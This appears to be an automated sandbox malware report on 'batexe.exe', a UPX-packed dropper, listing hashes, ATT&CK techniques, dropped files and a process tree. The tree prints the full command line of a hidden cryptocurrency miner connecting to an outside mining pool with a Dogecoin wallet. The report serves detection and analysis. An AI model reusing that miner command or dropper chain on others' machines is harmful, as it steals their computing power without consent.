73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
304s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18/02/2024, 17:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4376	b2e.exe
3284	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3284	cpuminer-sse2.exe
3284	cpuminer-sse2.exe
3284	cpuminer-sse2.exe
3284	cpuminer-sse2.exe
3284	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4808-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4808 wrote to memory of 4376	4808	batexe.exe	83
PID 4808 wrote to memory of 4376	4808	batexe.exe	83
PID 4808 wrote to memory of 4376	4808	batexe.exe	83
PID 4376 wrote to memory of 2892	4376	b2e.exe	84
PID 4376 wrote to memory of 2892	4376	b2e.exe	84
PID 4376 wrote to memory of 2892	4376	b2e.exe	84
PID 2892 wrote to memory of 3284	2892	cmd.exe	87
PID 2892 wrote to memory of 3284	2892	cmd.exe	87

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4808
- C:\Users\Admin\AppData\Local\Temp\8A2F.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8A2F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8A2F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\920E.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2892
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8A2F.tmp\b2e.exe

Filesize
9.2MB

MD5
16f8babc7dcf10a8e8d5650ba4685075

SHA1
8800ecba37d9a3bf8bbfb5a7153ebce6b231953e

SHA256
734c8ff77485b20e68258facec806fbc6d4bf2a41bc4adadd8547172d19e0cf7

SHA512
7dd43210cef9db6775e1989a4aeadb549574a251afa03d6fe432620c75d63b4a89ba49c8f0d224c6515e44cb887a93cc09372b8352d8051911755c24a866621e

Download Submit
C:\Users\Admin\AppData\Local\Temp\8A2F.tmp\b2e.exe

Filesize
1.9MB

MD5
62399a2262efcb91a712c4a9d2f728e1

SHA1
0fbf9433b95e62933ded8124591fa00a5d1c1468

SHA256
d05992fec657a763dfa5a014dc45375e2548801946e3118e3e9db4da165be897

SHA512
6396e3fdc02275d9367686d9d9929aa9c251f26977cb858b429003100525ba7d538cfda341e955d15f5baa2d51304938b216410e57c4ce906dfd18985801ed26

Download Submit
C:\Users\Admin\AppData\Local\Temp\8A2F.tmp\b2e.exe

Filesize
1.8MB

MD5
f51fe7ed64e17eb639e2b77a503596fc

SHA1
9de36c8a5bd8a21c006aabe8c222294852a802f1

SHA256
706fdab761081f7c0cbe20066009c226b25636178215be354891409ae09eecc7

SHA512
ffd4c6f3d081da80edc1bdcc52052d9965c854f7f4fe83e655da803a0fc5f9c261219ec8e12b45ba432cec0d740d314e2be5700a592e581b9f057bccfe516fca

Download Submit
C:\Users\Admin\AppData\Local\Temp\920E.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.1MB

MD5
d1f826395d94e22c9c91e1ef0a1ebeb3

SHA1
335184b9ff639f32b36ee0cba2f26b8dd8211b81

SHA256
f9f7bfc10027f7da959184fe713c3fe490d840153e607d5098dd17f906a4fd3c

SHA512
460223bb1ac828713b4543bff41e2403caec5e7d9bb7912a0dc0a748611efc69394d0a1507ad67aece9912d9fb3d02329762d2dcef1c5bff7b88490e37c7e8c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.1MB

MD5
eefcdc0201da49702c976c6202c6d93b

SHA1
72c594338505c068ed9b7f195338fbfc9ff728b8

SHA256
f977cb4d930f01c2a36802db502b63b9c73a79b254954ae30470427a40e4babc

SHA512
38c1d963b458e248a629627969591c44845ed4615c18f43605ea427885c1ec7458aa79818e9f31a5039dc801529235e88deffbe341b657c0600179394d15895f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
779KB

MD5
358263069c7ff6f0a58437ea54cf59f7

SHA1
4a4389ae2a5e344171528e115cd811f955314130

SHA256
b784fc5d8273e63f03911cb8a988cd72f62fc99dcf54a1eb147728225e153c2f

SHA512
6577fcc1a0a1dab130b8966a740bbe77b0c3aab8fc454f7bae565e8364ca097b72020b8d33b8b32ed22c348e39d332f057ae7d6e290b8c97b2a622e9395f1025

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
500KB

MD5
1256867d9986a161d230e46d0507e33c

SHA1
4737b30630e646095ff5bed37782afa2108018ff

SHA256
f5e8bb7d6f366077db79e9ac2f00553c6401194fa1437ba20732afc9952ba68a

SHA512
5eac0bae48ff08f5d5099c6919241da75729c5ceb7e268994eaaa6f8aaeee6f545119c33ce41ea166d8fe82447f529b319008627487b6e6a5a03cafa81ef8448

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
f40e5357f7e3c4f38eeca0abb2108bb0

SHA1
c9a22608d14d8bd611d738974f0594665c9c9e2f

SHA256
056b1d8bc4e441e072d7a02b31d73395b5bf851459e32be967410844da91938d

SHA512
1da2c5e46cdbfc011cfcac879bf33b39d5637c2371339528df963d0ef08be69368d33a870c2bf867e70356062ffb545dcf192bc8e8378c5eec79a2bc58642715

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
591KB

MD5
89ac444db3f430c6c091533a4ec54789

SHA1
f47700f3fc21addf48ced6f56cd25f03e48287b3

SHA256
8d3a268865ae5ccd92c2b1e3667c58712445c40a7e8c24f32c79f3e9b24c9a9b

SHA512
51cea0df10aeba788925104b372cde48bf28febd07be40bb0beb3d0fa00f404df77d48a052d292ba9e158631237a34e8d7cdc35bc07b4d274993fb0ac6b33c81

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
704KB

MD5
d8c24f8116ee4757d85d9de76a5119e6

SHA1
29c38b678132990f168fdda4330c277dfba1541d

SHA256
78ef57afa5649f67b8acc9b537def8414c12500976e955931a97ad6f5cdeedce

SHA512
97af42d997c38e211e993e95f03a9e1e6f99c4987fe6ada144cc0cd2871b15f99bd7bb2e98ab918453a1f04fee541851a95793f1b7469201c2d34517408d6b09

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
911KB

MD5
ca395ec3c826e880eea236891cc3e156

SHA1
97f6cd23c08bf578824d52aaa684fdcfec7546fc

SHA256
8400556d927409380d60582e8e736fcc657d407a7549c8fd170b60c5c9b93d95

SHA512
416719807f3d9ff6dd74c54c5abf8fb43c0849a1d126d6612ac5308d58c689a173cb866676d8133a901a19dd4be38b64600342792b73fdacb49c9c4710ac07a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
424KB

MD5
edd7726a39b2fe26daf6da0bca329e6b

SHA1
15cbfe35837ddc657f68a697e7c5bb660a5761b6

SHA256
6eb5f2166207c6e6293768e87af68a97338efc19ee801ac21ff33f8d05a3c64c

SHA512
03aeefd154f87ff59804bfd3bf6a8fea69b3227ab19367aa5cc5293d7ec05eadf2f32438c09cb35714d68d40a9103042fad7151506378866726f557f93dbf17b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/3284-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3284-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3284-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3284-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3284-45-0x0000000070B60000-0x0000000070BF8000-memory.dmp

Filesize
608KB

Download
memory/3284-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3284-47-0x0000000001070000-0x0000000002925000-memory.dmp

Filesize
24.7MB

Download
memory/3284-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3284-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3284-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3284-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3284-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3284-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3284-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3284-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4376-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4376-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4808-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download